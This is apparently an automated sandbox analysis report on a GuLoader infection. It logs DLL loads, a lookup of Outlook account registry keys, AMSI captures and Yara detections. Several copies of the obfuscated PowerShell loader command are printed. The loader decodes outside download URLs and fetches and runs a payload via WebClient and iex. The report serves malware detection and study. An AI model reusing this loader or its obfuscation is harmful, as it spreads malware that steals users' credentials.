Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Stumpnser Midernes Fugtighe", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unpumicated $Inddmningdducible $Tamburmajors), (Muscologist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tidslernes222 = [AppDomain]::CurrentDomain.GetA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cestode)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uranosphaerite, $false).DefineType($Postboy, $Seq
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), 